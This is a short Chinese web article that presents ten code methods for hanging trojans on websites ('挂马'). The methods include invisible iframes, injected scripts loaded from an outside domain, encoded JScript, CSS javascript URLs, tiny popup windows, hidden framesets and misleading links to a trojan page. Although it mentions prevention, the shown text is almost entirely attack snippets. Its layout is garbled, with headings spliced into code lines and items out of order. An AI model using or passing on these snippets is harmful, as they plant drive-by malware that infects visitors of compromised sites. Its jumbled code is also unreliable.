时间:2022-05-29 16:12:01 | 来源:网络营销
时间:2022-05-29 16:12:01 来源:网络营销
最近看了很多博友反馈的问题,发现最近一周谈论最多的问题就是“js挂马”的问题。问题也大多集中在如何挂马、挂马的方法有哪些?挂马的效果和如何防止自己网站被挂木马。当然也有一些博友说《常见JS挂马方法及如何防止网站被黑客挂马?》的文章介绍的js挂马方法不全。也给我列举了几种文章中未提及到的挂马方法,事后根据博友的反馈我也总结了一下,并根据自己多年做网站的经验汇总了10条网站挂木马的常用的一些代码写法。在此借助亿企邦的平台就给大家介绍一下具体代码操作:<iframe src=地址 width=0 height=0></iframe>2、js文件挂马
document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为:
<script language=javascript src=xxx.js></script>3、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.mahaixiang.cn/mama.txt></script>其中mama.txt可改成任意后缀
<body onload="window.location='地址';"></body>5、隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';6、css中挂马
body {7、JAJA挂马
background-image: url('javascript:document.write("<script src=http://www.mahaixiang.cn/muma.js></script>")')
}
<SCRIPT language=javascript>8、图片伪装
window.open("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
<html>9、伪装调用
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
<frameset rows="444,0" cols="*">10、高级欺骗手法
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
<a href="http://www.xxx.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>亿企邦点评:
<SCRIPT Language="JavaScript">
function www_xxx_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
关键词:操作,方法,木马